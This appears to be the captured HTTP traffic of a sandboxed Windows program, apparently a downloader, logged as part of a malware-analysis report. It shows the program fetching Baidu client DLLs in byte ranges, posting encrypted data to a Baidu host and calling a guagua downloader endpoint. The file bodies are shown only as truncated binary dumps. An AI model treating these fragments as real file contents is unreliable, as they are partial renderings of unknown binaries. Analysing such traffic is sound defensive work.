Accept-Language: zh-CN,zh,en-US<br>

Connection: Keep-Alive<br>

Host: dlsw.baidu.com<br>

Range: bytes=720896-<br>

Referer: hXXp://xf.baidu.com<br>

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>

<br>

</font><br><font color="blue">HTTP/1.1 206 Partial Content<br>

Server: JSP3/2.0.0-b<br>

Date: Sun, 17 Aug 2014 02:20:29 GMT<br>

Content-Type: application/x-msdownload<br>

Content-Length: 203600<br>

Connection: close<br>

ETag: 44edff85d12e091f0b129f05a3f2a042<br>

Last-Modified: Tue, 06 May 2014 07:48:08 GMT<br>

Expires: Mon, 18 Aug 2014 14:59:49 GMT<br>

Age: 127240<br>

Content-Range: bytes 720896-924495/924496<br>

Access-Control-Allow-Origin: *<br>

Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE<br>

Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id<br>

Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length<br>

Accept-Ranges: bytes<br>

x-bs-version: 45FD47DB9BA063A62A2F1AF299C66DD6<br>

x-bs-request-id: MTAuNDYuMTU3LjIzOjgwODA6MTU1MDU3MDk3NDoyOC9KdWwvMjAxNCAyMjo1ODo0MyA=<br>

x-bs-meta-crc32: 3569711378<br>

Content-MD5: 44edff85d12e091f0b129f05a3f2a042<br>

x-bs-client-ip: MTgwLjc2LjIyLjc1<br><pre>......................................................................<br>......................................................................<br>......................................................................<br>...... !"#$%&'()* ,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxy<br>z[\]^_`abcdefghijklmnopqrstuvwxyz{|}~.................................<br>......................................................................<br>......................................................................<br>...........................................</pre></font><br><br

<font color="red">GET /sw-search-sp/client2/ditch/25288850097/BDMZipNewForWs.dll HTTP/1.1<br>

Accept: */*<br>

Accept-Language: zh-CN,zh,en-US<br>

Connection: Keep-Alive<br>

Host: dlsw.baidu.com<br>

Range: bytes=131072-<br>

Referer: hXXp://dlsw.baidu.com/<br>

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>

<br>

</font><br><font color="blue">HTTP/1.1 206 Partial Content<br>

Server: JSP3/2.0.0-b<br>

Date: Sun, 17 Aug 2014 02:20:41 GMT<br>

Content-Type: application/x-msdownload<br>

Content-Length: 25873232<br>

Connection: close<br>

ETag: c7062e404128917808756500d58121ee<br>

Last-Modified: Fri, 11 Jul 2014 14:29:11 GMT<br>

Expires: Mon, 18 Aug 2014 15:00:39 GMT<br>

Age: 127202<br>

Content-Range: bytes 131072-26004303/26004304<br>

Access-Control-Allow-Origin: *<br>

Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE<br>

Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id<br>

Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length<br>

Accept-Ranges: bytes<br>

x-bs-version: DD1C492BA7010AF29AF13DA0A61E68AF<br>

x-bs-request-id: MTAuNDYuMjMxLjQwOjgwODA6MjcwNDI3OTU1MDoyOC9KdWwvMjAxNCAyMzowMDozOCA=<br>

x-bs-meta-crc32: 2839405489<br>

Content-MD5: c7062e404128917808756500d58121ee<br>

x-bs-client-ip: MTgwLjc2LjIyLjc5<br><pre>..3._^[..V.t$...t~.F.;.\...t.P..d..Y.F.;.`...t.P..c..Y.F.;.d...t.P..c.<br>.Y.F.;.h...t.P..c..Y.F.;.l...t.P..c..Y.F ;.p...t.P..c..Y.v$;5t...t.V..<br>c..Y^.U.....SV.u.W3.9~..}..u..}.u.9~.u..}..}..P....6...j0j........;.YY<br>[email protected]......;.Y.E.u.S.=c..Y...89~.......j..}...;.Y.E.u.S..c...u..<br>.c..Y...8..v8.C.Pj.V.E.j.P.15.....C.Pj.V.E.j.P..5.....C.Pj.V.E.j.P..5.<br>....C.Pj.V.E.j.P..4....P...C.Pj.V.E.j.P..4.....C PjPV.E.j.P..4.....C$P<br>jQV.E.j.P..4.....C(Pj.V.E.j.P..4....P...C)Pj.Vj..E.P..4.....C*PjTV.E.j<br>.P.w4.....C PjUV.E.j.P.c4.....C,PjVV.E.j.P.O4....P...C-PjWV.E.j.P.84..<br>...C.PjRV.E.j.P.$4.....C/PjSV.E.j.P..4....<..t$S.....S..a...u...a..<br>.u...a......Q....C.......0|[email protected]..#..;u....~........>.u.<br>[email protected][email protected]}...t..M......<br>...;.t.P..d.........;.t#P..d.....u.........a..........`..YY.E........E<br>.............3._^[..3..-....t"...t....t.Ht.3..........................<br>SUVW.......U3..^.WS..S...~..~..~.3..~............ ......CMu...........<br>......ANu._^][.U..$d..........<...3.......SW.E.P.v.................<br>...3........@;.r..E......... t .].......;.w. [email protected] R..S.....C..C<br>..u.j..v..E..v.PW......Pj.j...&..3.S.v.......WPW......PW.v.S.......DS.<br>v.......WPW......Ph.....v.S.y.....$3...LE....t..L...............t..L..<br> ........................@;.r..M.......E.....3.)E..U...........Z ...w.<br>.L....... .....w..L.. .... .......A;.r......._3.[..`..........j.h.....<br>.................Gpt...l.t..wh..u.j .....Y........j......Y.e...wh.u.;5<br>....t6..t.V..d.....u.......t.V.V^..Y......Gh.5.....u.V..\....E....</pre><<< skipped >>></font><br><br

<font color="red">GET /client/dllw5/BDLogicUtils.dll HTTP/1.1<br>

Accept: */*<br>

Accept-Language: zh-CN,zh,en-US<br>

Connection: Keep-Alive<br>

Host: dl1sw.baidu.com<br>

Range: bytes=458752-<br>

Referer: hXXp://dl1sw.baidu.com/<br>

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>

<br>

</font><br><font color="blue">HTTP/1.0 206 Partial Content<br>

Expires: Tue, 09 Sep 2014 15:52:20 GMT<br>

Date: Sun, 10 Aug 2014 15:52:20 GMT<br>

Server: nginx<br>

Content-Type: application/octet-stream<br>

Last-Modified: Tue, 06 May 2014 06:31:30 GMT<br>

Cache-Control: max-age=2592000<br>

Accept-Ranges: bytes<br>

Content-Range: bytes 458752-924495/924496<br>

Content-Length: 465744<br>

Age: 556088<br>

Via: 1.0 hzh64:8104 (Cdn Cache Server V2.0), 1.0 sdbz23:8080 (Cdn Cache Server V2.0), 1.0 jg9:51020 (Cdn Cache Server V2.0)<br>

Connection: close<br>

Content-Disposition: attachment;filename="BDLogicUtils.dll"<br>

Access-Control-Allow-Origin: *<br>

Access-Control-Allow-Methods: GET,PUT,POST,DELETE,OPTIONS,HEAD<br><pre>j.V..4.....V.?........^Y..........P.....Y.......QS.\$.UV.t$...9u.W.|$$<br>r.9{.s.......M..T$... .;.s....T$..C. ..|$(;.s...... . .;.w..`....E..T$<br>..... . ... .;..L$..\$.s>...v..7....T$..E.;.s..M.QS........T$.....u<br>.....].r..E....E....;l$ .].t}.E....r....T$(...\$(...r........T$.R.T$,.<br>..T$  .R ...P..Q......D$0....x..r....Q.........E....r.......W.|$(..R .<br>P..Q.c....N...;.w|.E....r..........r....T$ ...\$ .T$$W.. .QP.D$,..P...<br>...E.......r....L$$...\$$...r........T$.R.T$(...T$  .R ...P..Q.R......<br>...D$$;.wr.E....r....L$ ...\$ ...r........T$.R.T$$...T$  .R ...P..Q...<br>...E.......r..........r.......W.|$(..R .P..Q......T......;..E.w....r..<br>..T$ ...\$ ...r........T$.R.T$$...T$  .R ...P..Q.h....E.......r.......<br>...r. L$....L$$W.. .Q....... L$....L$$W.. .Q..........r..........r....<br>T$ ...\$ .T$.R.T$(.. .QP.D$,..P......E.......r....L$ ...\$ ...r.......<br>.T$.R.T$$...T$  .R ...P..Q......E.......r....L$ ...\$ ...r....T$....\$<br>..T$$.. L$. .Q.L$$...T$...Q.L$$.. ...PR.Y....D$ ....}...E.r..._....^..<br>][Y............SVW...w....r..G....G..T$.;.r>....G.r........_...;.v'<br>...r....L$.Q ..D$.R.T$.WRP......._^[....t$.9w.s.......G...U.l$. .;.s..<br>L$....\$ ... . .;.w..s....O. . .;..L$.sB.G.....O.r....T$ ...L$ ...r...<br>.T$.R.T$$.... .R ...P..Q.y....L$$.....w........... l$..o....v.......L$<br>..G.;.s .G.PU...V....L$.........9\$.sm.G....r/.W..-..u.....o.r..G.]...<br>.._^[....G.]....._^[....W.....T$.r..W....W.Q.L$....L$..T$$ .Q ...P..R.<br>........G....r..O....O..T$.SR .P..Q.-...........o.r..G...(.].._^[....G<br>...(.].._^[.............U..j.h....d.....P...SVW.....3.P.E.d......e</pre><<< skipped >>></font><br><br

<font color="red">POST / HTTP/1.1<br>

Connection: Keep-Alive<br>

Content-Length: 228<br>

Content-Type: application/octet-stream<br>

Host: s.x.baidu.com<br>

Keep-Alive: timeout=600,max=1000<br>

<br>

...p........" 228f74ad8138cf3f6e758ac75971083b(.28.G.k...v $(F.Cj...:....59......\....3V.%..5..2.c..`[email protected].` ...h.%h...C}.K{T\QZa.L.`. .P!..~...L.<..Vs..d."..v.<<..|'.f..>>..*E...........2........."S..,...N.$"....K....2</font><br><font color="blue">HTTP/1.1 200 OK<br>

Server: iYuntianSvr<br>

Content-Type: application/octet-stream<br>

Keep-Alive: timeout=30<br>

Connection: Keep-Alive<br>

Content-Length: 140<br><pre>...p........" 228f74ad8138cf3f6e758ac75971083b(.28.G.k...v $(F.Cj...:.<br>...59......\....3V.%..5..2.c..`[email protected].` .....%W............P.g<br>HTTP/1.1 200 OK..Server: iYuntianSvr..Content-Type: application/octet-<br>stream..Keep-Alive: timeout=30..Connection: Keep-Alive..Content-Length<br>: 140.....p........" 228f74ad8138cf3f6e758ac75971083b(.28.G.k...v $(F.<br>Cj...:....59......\....3V.%..5..2.c..`[email protected].` .....%W........<br>....P.g..</pre></font><br><br

<font color="red">GET /client/BDMReport.dll HTTP/1.1<br>

Accept: */*<br>

Accept-Language: zh-CN,zh,en-US<br>

Connection: Keep-Alive<br>

Host: dl1sw.baidu.com<br>

Range: bytes=983040-<br>

Referer: hXXp://xf.baidu.com<br>

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>

<br>

</font><br><font color="blue">HTTP/1.0 206 Partial Content<br>

Expires: Tue, 09 Sep 2014 16:02:45 GMT<br>

Date: Sun, 10 Aug 2014 16:02:45 GMT<br>

Server: nginx<br>

Content-Type: application/octet-stream<br>

Last-Modified: Wed, 15 May 2013 01:54:31 GMT<br>

Cache-Control: max-age=2592000<br>

Accept-Ranges: bytes<br>

Content-Range: bytes 983040-1207519/1207520<br>

Content-Length: 224480<br>

Age: 555466<br>

Via: 1.0 fjqz153:8080 (Cdn Cache Server V2.0), 1.0 sdbz73:8104 (Cdn Cache Server V2.0), 1.0 shiben10:51020 (Cdn Cache Server V2.0)<br>

Connection: close<br>

Content-Disposition: attachment;filename="BDMReport.dll"<br>

Access-Control-Allow-Origin: *<br>

Access-Control-Allow-Methods: GET,PUT,POST,DELETE,OPTIONS,HEAD<br><pre>.J.3..C..........................M..H....T$..B..J.3............|......<br>...........M.......T$..B..J.3.......H....L.................M...!...M..<br>.....T$..B..J.3.......|..............M..(#...M.......T$..B..J.3..|....<br>...............M.......M......4...T$..B..J.3..I................M..X...<br>.M.....m4...T$..B..J.3...................M..8....M......4...T$..B..J.3<br>.......L....Q......M.......M.....m4...M...... ...T$..B..J.3...........<br>.............M.......M......8...T$..B..J.3..y................M.......M<br>.....m8...T$..B..J.3..I................M..h....M.....M9...T$..B..J.3..<br>.....$...........M..8....M......9...M......*...T$..B..J.3.......`....F<br>...........M...y...T$..B..J.3..............................E..........<br>.e...M........T$..B..J.3..s..........................T$..B..J.3..L....<br>\..............E...........e...M..H.....T$..B..J.3............{.......<br>[email protected]$..B..J.3............;.............<br>...M..(M...E...........e...M........T$..B..J.3.....................M..<br>.L...T$..B..J.3..d...........................M...L...T$..B..J.3..4....<br>H......................M...L...T$..B..J.3.......|....l................<br>.M..XL...T$..B..J.3............<..................|..............|.<br>....M.........|..............|.....M.........|..............|.....M...<br>......|..............|.....M...>....T$...t.....p...3..*.......J.3..<br>.....................M...>...M...>...M..x>...T$..B..J.3......<br>.0....L.................M.......T$..B..J.3.......l....................<br>..M.......T$..B..J.3..............................M.......T$..B..J</pre><<< skipped >>></font><br><br

<font color="red">GET /client/dllv5/BDMReport.dll HTTP/1.1<br>

Accept: */*<br>

Accept-Language: zh-CN,zh,en-US<br>

Connection: Keep-Alive<br>

Host: dl1sw.baidu.com<br>

Range: bytes=458752-<br>

Referer: hXXp://dl1sw.baidu.com/<br>

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>

<br>

</font><br><font color="blue">HTTP/1.0 206 Partial Content<br>

Expires: Tue, 09 Sep 2014 15:52:41 GMT<br>

Date: Sun, 10 Aug 2014 15:52:41 GMT<br>

Server: nginx<br>

Content-Type: application/octet-stream<br>

Last-Modified: Wed, 30 Apr 2014 05:24:32 GMT<br>

Cache-Control: max-age=2592000<br>

Accept-Ranges: bytes<br>

Content-Range: bytes 458752-1207519/1207520<br>

Content-Length: 748768<br>

Age: 556070<br>

Via: 1.0 sdytwt85:88 (Cdn Cache Server V2.0), 1.0 tswt79:80 (Cdn Cache Server V2.0), 1.0 shiben14:10001 (Cdn Cache Server V2.0)<br>

Connection: close<br>

Content-Disposition: attachment;filename="BDMReport.dll"<br>

Access-Control-Allow-Origin: *<br>

Access-Control-Allow-Methods: GET,PUT,POST,DELETE,OPTIONS,HEAD<br><pre>.....v.......7._..._^[..........U.l$...VW..t.;l$.t.......t$..T$ ;.t'.G<br>. .............S..1~.QRQV........._.[.D$._.p.^.(].........U.l$...VW..t<br>.;l$.t..T....t$..T$ ;.t'.G. .............S..1~.QRQV.q......._.[.D$._.p<br>.^.(].........U.l$...VW..t.;l$.t.......t$..T$ ;.t'.G. .............S..<br>1~.QRQV........._.[.D$._.p.^.(]..........D$.V.t$.W.y....H........N.u..<br>.....>_..^.........A....D$.....P...................D$..Q.....P.....<br>...............SUVW.|$.....u..)....\$.;_.u.......C.P...t........N...t.<br>.F. ....;.r.......N.9\..ul..t..F. ....;.r.......V..l...^...u..........<br>.;k.u.......N....m.t..F. ....;.r.........F.....\$..l..t.....s....l$.;]<br>..\$.u..m...;^..;t..C..8...S.S.Q..........F...D$..x._^.(][...V...N....<br>..N..I.;F..F.....t.W.I..8P........;~...u._.F.P.........F.....^........<br>..D$.V.t$.W.y....H........N.u.......>_..^.........A....D$.....P....<br>...............D$..Q.....P....................SUVW.|$.....u..i....\$.;<br>_.u..[....C.P...4~.......N...t..F. ....;.r..4....N.9\..ul..t..F. ....;<br>.r.......V..l...^...u...........;k.u.......N....m.t..F. ....;.r.......<br>..F.....\$..l..t.....s....l$.;]..\$.u......;^..;t..C..8...S.S.Q..n....<br>...F...D$..x._^.(][...V...N......N..I.;F..F.....t.W.I..8P./......;~...<br>u._.F.P.........F.....^[email protected].<br>.v.^[email protected][email protected][email protected].....^....................<br>.....D$..Q.....P....................V...N......N..I.;F..F.....t.W.I..8<br>P.O......;~...u._.F.P.;.......F.....^..........D$..Q.....P............<br>........V...N......N..I.;F..F.....t.W.I..8P........;~...u._.F.P...</pre><<< skipped >>></font><br><br

<font color="red">GET /client/dllws/BDMNet.dll HTTP/1.1<br>

Accept: */*<br>

Accept-Language: zh-CN,zh,en-US<br>

Connection: Keep-Alive<br>

Host: dl1sw.baidu.com<br>

Range: bytes=458752-<br>

Referer: hXXp://dl1sw.baidu.com/<br>

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>

<br>

</font><br><font color="blue">HTTP/1.0 206 Partial Content<br>

Expires: Tue, 09 Sep 2014 15:52:24 GMT<br>

Date: Sun, 10 Aug 2014 15:52:24 GMT<br>

Server: nginx<br>

Content-Type: application/octet-stream<br>

Last-Modified: Thu, 10 Apr 2014 08:10:19 GMT<br>

Cache-Control: max-age=2592000<br>

Accept-Ranges: bytes<br>

Content-Range: bytes 458752-1178447/1178448<br>

Content-Length: 719696<br>

Age: 556090<br>

Via: 1.0 sdytwt89:8104 (Cdn Cache Server V2.0), 1.0 tswt88:8080 (Cdn Cache Server V2.0), 1.0 jg11:51020 (Cdn Cache Server V2.0)<br>

Connection: close<br>

Content-Disposition: attachment;filename="BDMNet.dll"<br>

Access-Control-Allow-Origin: *<br>

Access-Control-Allow-Methods: GET,PUT,POST,DELETE,OPTIONS,HEAD<br><pre>..L$X..U..z...L$\......V.RQP.........D$L..D$L..t$0......D$<.S...<<br>;....D$......D$<...P......D$<....v..D$H..t.P...........L$4d.....<br>.Y_^][..,.......j.hNU..d.....P......SUVW.....3.P..$....d.......$......<br>$....3...$.....0...x....I......:.u. ....D$..D$.P......d$0Q..$ ....t...<br>..$......T$,RV..$......$...........$.......8...d$XQ.........$4.....T$p<br>R..$8...........@..$.......$....P......L$.Q..8...d$X.D$T....$4.....X .<br>X$..$4......$....R..$8...........$8.......d$\P..$.....D$\.*.....$8....<br>..@....$....P..$......$...........$x......$x......$...........$......E<br>..L$$.T$(.M..L$,.D$$.E..U..D$(.E..M..D$,..$......D$$;.t..T$0.|$(R.....<br>.D$(...P.f{......\$$.\$(.\$,..$......L$tQ.......$.....T$4R.......$....<br>......$....P.?.......$....d......Y_^][............$.~..W.~.r........N.<br>..VQ.L$..-....~..r..?VW.L$.......T$..D$..L$.R.T$.PQR.D$(P.L$@Q........<br>[email protected][email protected]$H........L$X.P.V.H..3.....(_.<br>.$..............4SU.....9_.V.w.r........O...WQ.L$..w...9_.r..6WV.L$ .e<br>....T$..D$..L$..\[email protected]$XQ.\[email protected]$D."......V.......N..T$<br>..V..T$$t...t.;.t...{...D$$9D$.t.USW.L$4..........^][..4..........S.\$<br>.UV.... ...$I...................... .;..,.t. .j.j.V..3.Qy.....;.u.^..]<br>[.....U..j.h....d.....P...SVW.....3.P.E.d......e..]..}..u..u..E.......<br>..v.S...4..........}.....u....E......M.d......Y_^[..]..u..}.;.t.......<br>..;.u.j.j.................V..;.t0S3........~..r..F.P.~x......F......^.<br>.^....;.u.[^........j.h.{..d.....PV.....3.P.D$.d......t$..G.....F.....<br>..w.......P..u..........V.RQP.........D$......G..F..D$........L$.d</pre><<< skipped >>></font><br><br

<font color="red">GET /sw-search-sp/client2/ditch/25288850097/BDMZipNewForWs.dll HTTP/1.1<br>

Accept: */*<br>

Accept-Language: zh-CN,zh,en-US<br>

Connection: Keep-Alive<br>

Host: dlsw.baidu.com<br>

Range: bytes=13107200-<br>

Referer: hXXp://dlsw.baidu.com/<br>

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>

<br>

</font><br><font color="blue">HTTP/1.1 206 Partial Content<br>

Server: JSP3/2.0.0-b<br>

Date: Sun, 17 Aug 2014 02:20:40 GMT<br>

Content-Type: application/x-msdownload<br>

Content-Length: 12897104<br>

Connection: close<br>

ETag: c7062e404128917808756500d58121ee<br>

Last-Modified: Fri, 11 Jul 2014 14:29:11 GMT<br>

Expires: Mon, 18 Aug 2014 15:00:39 GMT<br>

Age: 127201<br>

Content-Range: bytes 13107200-26004303/26004304<br>

Access-Control-Allow-Origin: *<br>

Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE<br>

Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id<br>

Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length<br>

Accept-Ranges: bytes<br>

x-bs-version: DD1C492BA7010AF29AF13DA0A61E68AF<br>

x-bs-request-id: MTAuNDYuMjMxLjQwOjgwODA6MjcwNDI3OTU1MDoyOC9KdWwvMjAxNCAyMzowMDozOCA=<br>

x-bs-meta-crc32: 2839405489<br>

Content-MD5: c7062e404128917808756500d58121ee<br>

x-bs-client-ip: MTgwLjc2LjIyLjc5<br><pre>O.....E..&N..a.!....)...8.e.p..|...'.......]><|.(.I...2.v$..><br>.=T`c.^.....[..\R~l7..a..E(.jwP...b0)..,.b...|...2....G]HbF.II..'7\...<br>Lf..3O.\. [email protected].......*.}A....!.Pb `.P!.7..z......]..f....:%.Qe...|...<br>[email protected].....,.....>?q...n..^..yn......QP./.H..{!....[|G..i.CX..<br>R0.... p.32...zU...\..9s.@..|2..*UZ.I*..).WmG..b..sSA. ...|a.K.H....}l<br>....$&|7SHz_..d.X....>".......;e..gG.....\... .?y...4X...l.-..e...,<br>..H.....<T.-IE_.$.....n#O.dq8..N..X.....*@,.......I)(....FW....'D._<br>/.;...A)...............\..Uq!L....4<.G.w....-...Ey..h$]\c..R..P.u..<br>...5.9*..Nq].}......u....j.1P.9{.T./.......<.....:..%C...C.....b.Z.<br>....oT @..f.3*..]B..n...t.Y..d1.~..7E..R>.....UW...H..]..q....&H.d.<br>.7%ws.<:..6.Y)..Ay...L....c.F.z...8\C..._.,...y....iZ..N...7...E'.@<br>.....<...l.Wb.x....m\W.- .......^cJ(..[H.t.4%...2.....1a.=5.y.2...e<br>7.......q.....U,.1Bv.p.'.;..\e...1./..4.0..Mw..U..J.k..M..........r...<br>.....1.Vg.8\.......[vd;... N.Re,.E....[.$.$.N../.Y.Q.......Q$...A2R...<br>[email protected]"...!'F.~.P........3l...G.7.u .3...j........a.....>S.<br>......b...y2...NHv&r.N.b..x3.x........$.8G[..>..k....)B~....)....,.<br>..N.=..!.0...3.Z.Z.9.^.8 ..'....,....R\.Z$.... ..^..RI\O=..k8...P6....<br>...@...|.]2..,.X...CyLM.w.....t...x._|k..ce....S.}s.s..i..w..'...;|...<br>.#[.S..T8.:......h.*.......n....pm..3.q...DU..G..$......$`.9....T.F...<br>.E..K("]Z..}..`...E..04BF..K...RI.......{7>...c.......=M..~....._..<br>)<k.xG......<.`Sh..^...&ss5..y8HZ.....6.%...MX.K.n.1.jo.F..B....<br>.k).N...q.3 -.......d.}.....p.......-..p,m.\&.O...X..k.M.......C..</pre><<< skipped >>></font><br><br

<font color="red">GET /client/dllv5/BDMReport.dll HTTP/1.1<br>

Accept: */*<br>

Accept-Language: zh-CN,zh,en-US<br>

Connection: Keep-Alive<br>

Host: dl1sw.baidu.com<br>

Range: bytes=622592-<br>

Referer: hXXp://dl1sw.baidu.com/<br>

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>

<br>

</font><br><font color="blue">HTTP/1.0 206 Partial Content<br>

Expires: Tue, 02 Sep 2014 13:53:19 GMT<br>

Date: Sun, 03 Aug 2014 13:53:19 GMT<br>

Server: nginx<br>

Content-Type: application/octet-stream<br>

Last-Modified: Wed, 30 Apr 2014 05:24:32 GMT<br>

Cache-Control: max-age=2592000<br>

Accept-Ranges: bytes<br>

Content-Range: bytes 622592-1207519/1207520<br>

Content-Length: 584928<br>

Age: 1168032<br>

Via: 1.0 wzpy185:88 (Cdn Cache Server V2.0), 1.0 jg9:10001 (Cdn Cache Server V2.0)<br>

Connection: close<br>

Content-Disposition: attachment;filename="BDMReport.dll"<br>

Access-Control-Allow-Origin: *<br>

Access-Control-Allow-Methods: GET,PUT,POST,DELETE,OPTIONS,HEAD<br><pre>V.1.0.q..p.......;.u.^...........T$..L$.;..D$.t.V.q.......;..0.q..p.u.<br>^............L$...4....H...................................D$..V......<br>..t.V.1b.......^.....D$..V........t.V..b.......^....V.t$..F.=....s....<br>....^.P........F......^.......j.h....d.....P..0..v..3.P.D$4d.....3..T$<br>...A....h.........wF.$........A..L$4d......Y..<....B..L$4d......Y..<br><[email protected]$4d......Y..<.h....h<...j..L$..T$...7..h.......D$@..<br>....<..P.L$...F...L$..D$<......7..3..L$4d......Y..<.3...H...]<br>...3...]...H...3...H...]...3...............V.....N.;.t.P.sj......D$..t<br>.V..`.......^........V.....N.;.t.P.Cj......D$..t.V.u`.......^........V<br>.....N.;.t.P..j......D$..t.V.E`.......^........V.....N.;.t.P..i......D<br>$..t.V..`.......^........V.....N.;.t.P..i......D$..t.V.._.......^.....<br>...V.....N.;.t.P..i......D$..t.V.._.......^........V.....N.;.t.P.Si...<br>...D$..t.V.._.......^.........A....D$..P......................D$..Q..P<br>[email protected]$..............D$..............A.............<br>..D$.VW.|$............F.u...j...>_..^............V...>.u...i....<br>.N.;H.u...i...F....^.............V...>.u...i...F..x1.t.^..i...H..y1<br>.u....x1.u..I......x1.t..N.^[email protected].;H.u..F....B..x1.t..F.^......<br>.........................T$..B.V.0.r..0.~1.u..V..r..p..I.;Q.^u..A....B<br>.....J.;.u......B.....A....B.......T$...V.p..2.p..~1.u..V..r..p..I.;Q.<br>^u..A..P..B.....J.;Q.u..A..P..B.......P..B............................<br>......V...8.....^......D$.j.P.........................................<br>.................................................D$...t..L$.......</pre><<< skipped >>></font><br><br

<font color="red">GET /client/dllv5/BDMReport.dll HTTP/1.1<br>

Accept: */*<br>

Accept-Language: zh-CN,zh,en-US<br>

Connection: Keep-Alive<br>

Host: dl1sw.baidu.com<br>

Referer: hXXp://dl1sw.baidu.com/<br>

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>

<br>

</font><br><font color="blue">HTTP/1.0 200 OK<br>

Expires: Tue, 02 Sep 2014 13:53:19 GMT<br>

Date: Sun, 03 Aug 2014 13:53:19 GMT<br>

Server: nginx<br>

Content-Type: application/octet-stream<br>

Content-Length: 1207520<br>

Last-Modified: Wed, 30 Apr 2014 05:24:32 GMT<br>

Cache-Control: max-age=2592000<br>

Accept-Ranges: bytes<br>

Age: 1168031<br>

Via: 1.0 wzpy185:88 (Cdn Cache Server V2.0), 1.0 jg9:10001 (Cdn Cache Server V2.0)<br>

Connection: close<br>

Content-Disposition: attachment;filename="BDMReport.dll"<br>

Access-Control-Allow-Origin: *<br>

Access-Control-Allow-Methods: GET,PUT,POST,DELETE,OPTIONS,HEAD<br><pre>MZ......................@.............................................<br>..!..L.!This program cannot be run in DOS mode....$.......M......S...S<br>...S.Y.S...S.[.S...S.[.S...S...S...S.[.S!..S...S...S...S...S.[.Sd..S.[<br>.S...S.[.S...S...S...S.[.S...SRich...S........................PE..L...<br>.!.Q...........!.....P... ......u........`............................<br>...........................................j.......V..................<br>[email protected]..@............`<br>..t............................text....O.......P.................. ..`<br>.rdata..1....`.......`..............@[email protected][email protected]........<br>[email protected]...............................@[email protected]..............<br>[email protected]..................................................<br>......................................................................<br>......................................................................<br>......................................................................<br>......................................................................<br>......................................................................<br>......................................................................<br>......................................................................<br>......................................................................<br>......................................................................<br>......................................................................<br>..................................................................</pre><<< skipped >>></font><br><br

<font color="red">GET /downloader/start?dlver=G1.0.0&pname=guagua&pver=514&cmdtype=0&cmdid=77150006814&ad=0&oemid=0&fromurl=&webid= HTTP/1.1<br>

Accept: */*<br>

User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT)<br>

Host: cj.guagua.cn<br>

Cache-Control: no-cache<br>

<br>

</font><br><font color="blue">HTTP/1.1 200 OK<br>

Server: nginx<br>

Date: Sun, 17 Aug 2014 02:20:39 GMT<br>

Content-Length: 0<br>

Connection: keep-alive<br>

P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"<br><pre>HTTP/1.1 200 OK..Server: nginx..Date: Sun, 17 Aug 2014 02:20:39 GMT..C<br>ontent-Length: 0..Connection: keep-alive..P3P: CP="CURa ADMa DEVa PSAo<br> PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"..</pre></font><br><br

<font color="red">GET /sw-search-sp/client2/ditch/25288850097/BDMZipNewForWs.dll HTTP/1.1<br>

Accept: */*<br>

Accept-Language: zh-CN,zh,en-US<br>

Connection: Keep-Alive<br>

Host: dlsw.baidu.com<br>

Range: bytes=22675456-<br>

Referer: hXXp://dlsw.baidu.com/<br>

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>

<br>

</font><br><font color="blue">HTTP/1.1 206 Partial Content<br>

Server: JSP3/2.0.0-b<br>

Date: Sun, 17 Aug 2014 02:21:22 GMT<br>

Content-Type: application/x-msdownload<br>

Content-Length: 3328848<br>

Connection: close<br>

ETag: c7062e404128917808756500d58121ee<br>

Last-Modified: Fri, 11 Jul 2014 14:29:11 GMT<br>

Expires: Mon, 18 Aug 2014 15:00:39 GMT<br>

Age: 127243<br>

Content-Range: bytes 22675456-26004303/26004304<br>

Access-Control-Allow-Origin: *<br>

Access-Control-Allow-Methods: HEAD, GET, OPTIONS, PUT, POST, DELETE<br>

Access-Control-Expose-Headers: Content-Length, ETag, x-bs-request-id, x-pcs-request-id<br>

Access-Control-Allow-Headers: Range, Origin, Content-Type, Accept, Content-Length<br>

Accept-Ranges: bytes<br>

x-bs-version: DD1C492BA7010AF29AF13DA0A61E68AF<br>

